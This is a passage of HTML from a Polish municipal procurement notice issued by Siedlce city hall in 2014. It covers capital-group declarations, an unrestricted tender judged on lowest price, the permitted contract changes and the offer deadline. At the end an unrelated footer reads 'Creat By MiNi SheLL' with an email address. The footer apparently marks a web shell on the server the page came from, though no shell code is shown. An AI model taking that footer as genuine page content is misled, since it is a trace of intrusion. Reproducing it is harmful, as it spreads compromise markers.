</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zastrzega sobie  prawo dokonania zmian postanowień umowy w następujących okolicznościach: 1)Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w przypadku:a)urzędowej zmiany podatku VAT, wynagrodzenie umowne ulega odpowiedniej zmianie, b)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, c) zmiany przedstawicieli stron umowy i osób odpowiedzialnych za realizację zamówienia z przyczyn obiektywnych (np.: zdarzenia losowe, zmiana pracy, rezygnacja), d)wnioskowania przez Wykonawcę o dokonanie zmiany osoby głównego projektanta studium w przypadkach zdarzeń losowych uniemożliwiających  pełnienie funkcji lub niewywiązywania się tej osoby z obowiązków wynikających z umowy, e)	żądania od Wykonawcy zmiany głównego projektanta studium, jeśli Zamawiający uzna, że nie spełnia on w sposób należyty obowiązków wynikających z umowy;2)	Zamawiający dopuszcza zmianę umownego efektywnego czasu opracowania  etapów prac w przypadku: a)zawieszenia prac przez Zamawiającego, b)konieczności wykonania dodatkowych badań i ekspertyz, c) przedłużenia się terminu uzgodnień zewnętrznych przez podmioty do tego upoważnione; 3) efektywny czas opracowania przedmiotu  umowy może zostać wydłużony  maksymalnie o czas opóźnienia   spowodowanego wymienionymi w pkt 2) okolicznościami; 4)	zaistnienia innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy skutkujących niemożliwością prowadzenia prac. 2.Wszystkie postanowienia, o których mowa w ustępie 1 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania  do wyrażenia takiej zgody. 
3.Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy pod rygorem nieważności. 
4.Warunkiem wprowadzenia istotnych zmian zawartej umowy jest podpisanie sporządzonego przez strony Protokółu konieczności określającego przyczyny zmiany. Protokół konieczności będzie załącznikiem do aneksu zmieniającego umowę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.siedlce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Referat Zamówień Publicznych Urzędu Miasta Siedlce, 08-110 Siedlce, Skwer Niepodległości 2, pok. nr 3..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2014 godzina 09:45, miejsce: Kancelaria Ogólna Urzędu Miasta Siedlce, pokój Nr 30, Skwer Niepodległości 2, 08-110 Siedlce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com